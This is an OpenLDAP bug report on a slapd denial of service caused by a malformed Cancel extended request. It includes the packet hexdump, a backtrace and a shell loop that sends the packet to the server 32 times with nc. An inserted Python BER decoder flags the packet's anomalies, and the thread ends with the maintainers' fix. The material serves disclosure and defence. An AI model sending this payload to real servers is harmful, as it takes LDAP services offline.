https://bugs.openldap.org/show_bug.cgi?id=9428
Issue ID: 9428
Summary: DoS due to infinite packet processing in slapd
Product: OpenLDAP
Version: unspecified
Hardware: All
OS: All
Status: UNCONFIRMED
Severity: normal
Priority: ---
Component: slapd
Assignee: bugs@openldap.org
Reporter: phasip@gmail.com
Target Milestone: ---
Processing of a packet results in the command handling thread becoming stuck in an infinite loop. After sending 32 of these, slapd doesn't respond to any new queries and consumes 100% CPU.
Packet
00000000: 3036 0200 7730 300b 312e 332e 362e 312e  06..w00.1.3.6.1.
00000010: 312e 3881 1030 0130 0030 3030 3030 3030  1.8..0.0.0000000
00000020: 3030 3030 3030 0030 3030 3030 3030 3030  000000.000000000
00000030: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
00000040: 30                                       0
GDB backtrace
(gdb) thread 3
[Switching to thread 3 (Thread 0x7fff8aad2700 (LWP 12))]
#0  0x00007ffff7eb489b in sched_yield () at ../sysdeps/unix/syscall-template.S:78
78	../sysdeps/unix/syscall-template.S: No such file or directory.
(gdb) bt
#0  0x00007ffff7eb489b in sched_yield () at ../sysdeps/unix/syscall-template.S:78
#1  0x0000555555671671 in ldap_pvt_thread_yield () at thr_posix.c:249
#2  0x00005555555d9255 in cancel_extop (op=0x7fff7c001160, rs=<optimized out>) at cancel.c:143
#3  0x00005555555b449a in fe_extended (op=0x7fff7c001160, rs=0x7fff8aad1a80) at extended.c:225
#4  0x00005555555b41c2 in do_extended (op=0x7fff7c001160, rs=0x7fff8aad1a80) at extended.c:175
#5  0x0000555555583d09 in connection_operation (ctx=ctx@entry=0x7fff8aad1ba0, arg_v=0x7fff7c001160) at connection.c:1163
#6  0x0000555555584370 in connection_read_thread (ctx=0x7fff8aad1ba0, argv=0xc) at connection.c:1314
#7  0x0000555555671080 in ldap_int_thread_pool_wrapper (xpool=0x555555799240) at tpool.c:1051
#8  0x00007ffff7faa609 in start_thread (arg=<optimized out>) at pthread_create.c:477
#9  0x00007ffff7ed1293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
Testing:
docker run --privileged -it --net=host --entrypoint gdb phasip/openldap /openldap/servers/slapd/slapd -ex 'set args -h ldap://:1389/ -d 256' -ex 'run'

for i in {1..32}; do echo -en '\x30\x36\x02\x00\x77\x30\x30\x0b\x31\x2e\x33\x2e\x36\x2e\x31\x2e\x31\x2e\x38\x81\x10\x30\x01\x30\x00\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x00\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30' | timeout 1 nc localhost 1389 & done
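Added example, not OpenLDAP code and not from the reporter: a strict BER decoder for the packet in this report. The bytes are the report's hexdump; the tags and the Cancel OID 1.3.6.1.1.8 follow RFC 4511 and RFC 3909. Every element is bounds-checked against the element that encloses it and each departure from the LDAPMessage / cancelRequestValue syntax is recorded, so the packet can be recognised in a capture or rejected by a front-end before it reaches slapd. Reading the requestName whatever tag it carries is this example's own leniency, chosen so the OID is still reported; the report does not state why cancel_extop() spins and the decoder makes no claim about that. The function and constant names (inspect_ldap_message, build_cancel_request, REPORT_PACKET) are chosen here, and build_cancel_request() constructs a well-formed Cancel request for comparison.

```python
CANCEL_OID = "1.3.6.1.1.8"          # LDAP Cancel Operation (RFC 3909)
TAG_SEQUENCE = 0x30
TAG_INTEGER = 0x02
TAG_EXTENDED_REQUEST = 0x77         # [APPLICATION 23] ExtendedRequest (RFC 4511)
TAG_REQUEST_NAME = 0x80             # [0] requestName
TAG_REQUEST_VALUE = 0x81            # [1] requestValue

# The 65 bytes from the report's hexdump, one line of the dump per string.
REPORT_PACKET = bytes.fromhex(
    "303602007730300b312e332e362e312e"
    "312e3881103001300030303030303030"
    "30303030303000303030303030303030"
    "30303030303030303030303030303030"
    "30"
)


def tlv(tag, content):
    """Encode one BER element with a definite length (short or long form)."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


def read_tlv(buf, pos):
    """Read tag and length at pos; return (tag, value_start, value_end).

    Raises ValueError whenever the element does not fit inside buf, which is
    what makes the decoder strict: callers pass the enclosing element's value
    as buf, so an inner element can never run past its parent."""
    if pos + 2 > len(buf):
        raise ValueError("truncated: missing tag or length")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long-form length
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("bad length encoding")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated: value runs past end of enclosing element")
    return tag, pos, pos + length


def decode_integer(buf, start, end, anomalies, what):
    """X.690 8.3.1: an INTEGER has at least one content octet. Flag an empty one."""
    if start == end:
        anomalies.append(f"{what}: zero-length INTEGER")
        return 0
    return int.from_bytes(buf[start:end], "big", signed=True)


def decode_cancel_value(value, anomalies):
    """cancelRequestValue ::= SEQUENCE { cancelID MessageID }; None if malformed."""
    try:
        tag, s, e = read_tlv(value, 0)
        if tag != TAG_SEQUENCE:
            raise ValueError(f"expected SEQUENCE, got tag 0x{tag:02x}")
        seq = value[s:e]                    # inner element is bounded by the SEQUENCE
        itag, is_, ie = read_tlv(seq, 0)
        if itag != TAG_INTEGER:
            raise ValueError(f"expected INTEGER cancelID, got tag 0x{itag:02x}")
        return decode_integer(seq, is_, ie, anomalies, "cancelID")
    except ValueError as err:
        anomalies.append(f"cancelRequestValue: {err}")
        return None


def inspect_ldap_message(packet):
    """Decode one LDAPMessage; return its fields and a list of syntax anomalies."""
    anomalies = []
    tag, s, e = read_tlv(packet, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError("LDAPMessage must be a SEQUENCE")
    if e < len(packet):
        anomalies.append(f"{len(packet) - e} trailing byte(s) after LDAPMessage")
    tag, ms, me = read_tlv(packet, s)
    if tag != TAG_INTEGER:
        raise ValueError("messageID must be an INTEGER")
    result = {"messageID": decode_integer(packet, ms, me, anomalies, "messageID"),
              "is_cancel": False, "anomalies": anomalies}
    op_tag, os_, oe = read_tlv(packet, me)
    result["op_tag"] = op_tag
    if oe < e:
        anomalies.append(f"{e - oe} unexpected byte(s) inside LDAPMessage after protocolOp")
    if op_tag != TAG_EXTENDED_REQUEST:
        return result
    # requestName: record a wrong tag instead of refusing, so the OID is still reported.
    ntag, ns, ne = read_tlv(packet, os_)
    if ntag != TAG_REQUEST_NAME:
        anomalies.append(f"requestName tagged 0x{ntag:02x}, expected [0] (0x80)")
    result["requestName"] = packet[ns:ne].decode("ascii", "replace")
    result["is_cancel"] = result["requestName"] == CANCEL_OID
    if ne < oe:
        vtag, vs, ve = read_tlv(packet, ne)
        if vtag != TAG_REQUEST_VALUE:
            anomalies.append(f"requestValue tagged 0x{vtag:02x}, expected [1] (0x81)")
        if ve < oe:
            anomalies.append(f"{oe - ve} unexpected byte(s) inside ExtendedRequest after requestValue")
        if result["is_cancel"]:
            result["cancelID"] = decode_cancel_value(packet[vs:ve], anomalies)
    return result


def build_cancel_request(message_id, cancel_id):
    """Well-formed Cancel request, constructed here for comparison (IDs 0..127)."""
    value = tlv(TAG_SEQUENCE, tlv(TAG_INTEGER, bytes([cancel_id])))
    op = tlv(TAG_EXTENDED_REQUEST,
             tlv(TAG_REQUEST_NAME, CANCEL_OID.encode()) + tlv(TAG_REQUEST_VALUE, value))
    return tlv(TAG_SEQUENCE, tlv(TAG_INTEGER, bytes([message_id])) + op)


if __name__ == "__main__":
    for name, pkt in (("report packet", REPORT_PACKET), ("well-formed", build_cancel_request(8, 7))):
        r = inspect_ldap_message(pkt)
        print(name, {k: v for k, v in r.items() if k != "anomalies"})
        for a in r["anomalies"]:
            print("  !", a)
```

Run stand-alone, the decoder reports the report's packet as a Cancel request whose messageID INTEGER is empty, whose cancelRequestValue is truncated after the SEQUENCE header, and which carries extra bytes at three nesting levels; the constructed request decodes with messageID 8, cancelID 7 and no anomalies. A front-end that drops any message with a non-empty anomaly list never forwards the reported packet.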
Howard Chu hyc@openldap.org changed:
           What    |Removed     |Added
----------------------------------------------------------------------------
         Status    |UNCONFIRMED |RESOLVED
     Resolution    |---         |TEST
--- Comment #1 from Howard Chu hyc@openldap.org ---
fixed in master
Quanah Gibson-Mount quanah@openldap.org changed:
           What    |Removed     |Added
----------------------------------------------------------------------------
Target Milestone   |---         |2.4.57
--- Comment #2 from Quanah Gibson-Mount quanah@openldap.org ---
trunk:
• dfe1f649 by Howard Chu at 2020-12-20T21:31:15+00:00 ITS#9428 fix cancel exop
Quanah Gibson-Mount quanah@openldap.org changed:
           What    |Removed     |Added
----------------------------------------------------------------------------
     Resolution    |TEST        |FIXED
--- Comment #3 from Quanah Gibson-Mount quanah@openldap.org ---
RE24:
• 9d0e8485 by Howard Chu at 2020-12-21T16:05:12+00:00 ITS#9428 fix cancel exop
Quanah Gibson-Mount quanah@openldap.org changed:
           What    |Removed     |Added
----------------------------------------------------------------------------
         Status    |RESOLVED    |VERIFIED